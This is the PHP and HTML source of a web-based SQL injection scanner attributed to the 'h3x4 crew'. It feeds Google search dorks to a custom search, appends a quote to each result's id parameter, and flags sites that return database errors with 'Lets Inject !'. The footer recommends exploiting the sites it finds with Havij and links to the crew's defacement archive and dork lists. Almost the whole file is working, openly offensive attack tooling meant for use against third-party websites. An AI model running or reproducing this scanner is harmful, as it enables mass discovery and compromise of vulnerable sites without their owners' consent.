scanner h3x4 v2

1. <html>
2. <head>
3. <title>h3x4 crew - SQLI scanner</title>
4. <style>
5. body{
6. background: #0F0F0F;
7. color: #A9A9A9;
8. font-family: monospace;
9. font-size: 12px;
10. }
11.  
12. input{
13. background: #808080;
14. border: 1px solid #000000;
15. color: #E6E6FA;
16. }
17.  
18. h2{
19. color: #E6E6FA;
20. }
21.  
22. a{ color: #5A5A5A; text-decoration: none; }
23. a:visited, a:active{ color: #5C5C5C; text-decoration: line-through; }
24. a:hover{ color: #00FFCC; text-decoration: line-through; }
25. .effectok:hover { text-decoration: underline; }
26. .effectfalse:hover { text-decoration: line-through; }
27.  
28. </style>
29. <LINK REL="SHORTCUT ICON" HREF="http://scanner.masterskillstudent.com/favicon.ico">
30. </head><center>
31. <body align="center">
32. <small><small>How to edit dork : inurl:[<span
33. style="color: rgb(255, 255, 51);">filename</span>].php?id=+site:[<span
34. style="color: rgb(255, 255, 51);">countrycode</span>]<br>
35. example : inurl:<span style="color: rgb(255, 255, 51);">news</span>.php?id=+site:<span
36. style="color: rgb(255, 255, 51);">id</span> ( scan
37. file <span style="color: red;">news.php</span> for <span
38. style="color: red;">Indonesia</span> site )</small></small>
39. <br>
40. <?php
41. echo "<h2>SQLI vulnerable site checker</h2>";
42. echo "<form action='' method='post'>";
43. echo "<b>Dork</b>: <p><input type='text' name='dork' value='inurl:php?id=+site:my'></p>";
44. echo "<input type='submit' value=' Hack! '>";
45. echo "<hr><br />";
46.  
47. if($_POST['dork']) {
48.  
49. @set_time_limit(0);
50. @error_reporting(0);
51. @ignore_user_abort(true);
52. ini_set('memory_limit', '128M');
53.  
54. $google = "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";
55.  
56. $i = 0;
57. $a = 0;
58. $b = 0;
59.  
60. while($b <= 10000) {
61. $a = 0;
62. flush(); ob_flush();
63. echo "@ Site Checked : [ $b ]<br />";
64. echo "@ Dork used : [ <b>".$_POST['dork']."</b> ]<br />";
65. echo "@ Scanning in Process ! .<br />";
66. flush(); ob_flush();
67.  
68. if(preg_match("/did not match any documents/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $val)) {
69. echo "See something but not found??<br />";
70. flush(); ob_flush();
71. break;
72. }
73.  
74. preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $sites);
75. echo "Result of injection...<br />";
76. flush(); ob_flush();
77. while(1) {
78.  
79. if(preg_match("/You have an error in your SQL|Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function|Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/", Connect_Host(str_replace("=", "='", $sites[2][$a])))) {
80. echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectok'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='yellow'>Lets Inject ! </font><br />";
81. } else {
82. echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectfalse'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='red'>Just Leave it! </font><br />";
83. flush(); ob_flush();
84. }
85. if($a > count($sites[2])-2) {
86. echo "Lets..scan other page.. <br />";
87. break;
88. }
89. $a = $a+1;
90. }
91. $b = $b+100;
92. }
93. }
94.  
95. function Connect_Host($url) {
96. $ch = curl_init();
97. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
98. curl_setopt($ch, CURLOPT_HEADER, 1);
99. curl_setopt($ch, CURLOPT_URL, $url);
100. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
101. curl_setopt($ch, CURLOPT_TIMEOUT, 30);
102. $data = curl_exec($ch);
103. if($data) {
104. return $data;
105. } else {
106. return 0;
107. }
108. }
109.  
110. function Clean($text) {
111. return htmlspecialchars($text, ENT_QUOTES);
112. }
113.  
114. ?>
115. </center>
116. </body>
117. </html>
118. <br><div style="text-align: center;"><span
119. style="font-family: Arial; color: rgb(204, 0, 0);"><span
120. style="font-weight: bold;">S</span><small>Q</small><big><big>L</big></big>I
121. <small>scanner</small></span><br
122. style="font-family: Arial;">
123. <span style="font-family: Arial;">[ <big
124. style="font-weight: bold;"><span
125. style="color: rgb(0, 0, 153);">h</span><span
126. style="color: yellow;">3</span><span
127. style="color: red;">x</span><span
128. style="color: white;">4</span> <span
129. style="color: red;">c</span><span
130. style="color: white;">r</span><span
131. style="color: red;">e</span><span
132. style="color: white;">w</span></big> ]</span><br
133. style="font-family: Arial;">
134. <small><small><span style="font-family: Arial;">-Fakyu Tuyu , Cyg Selalu , Shah MIRC , Damien faisal , hexon , Fiqri Shah , Amy Barin , Pidot , Ery Ramlee , Pak Arab , Black Hand ( syam92x ) , hambamalam , wanwawan , masokis , akeem , iawaho , pii VVip , Dboyz , d3r1s</span></small></small><br
135. style="font-family: Arial;">
136. <small><small><span style="font-family: Arial;">-
137. Special Thanks to Syam92x ( Black Hand )</span></small></small>
138. <br>
139. <br>Notes : When u get the site is vulnerable sqli , u are adviseable to use Havij , so ur hacking process more easier!
140. <br><a href="http://scanner.masterskillstudent.com/Tools.html" target="_blank">Download tools</a> | <a href="countrylist.txt" target="_blank">Country ID</a> | <a href="http://zone-h.org/archive/notifier=h3x4%20crew" target="_blank">h3x4 crew</a> | <a href="dorklist.txt" target="_blank">Dork List</a>
141. <br>
142. <a href="http://www.quick-counter.net/" title="HTML hit counter - Quick-counter.net"><img src="http://www.quick-counter.net/aip.php?tp=bd&tz=Europe%2FLondon" alt="HTML hit counter - Quick-counter.net" border="0" /></a>
143. </div>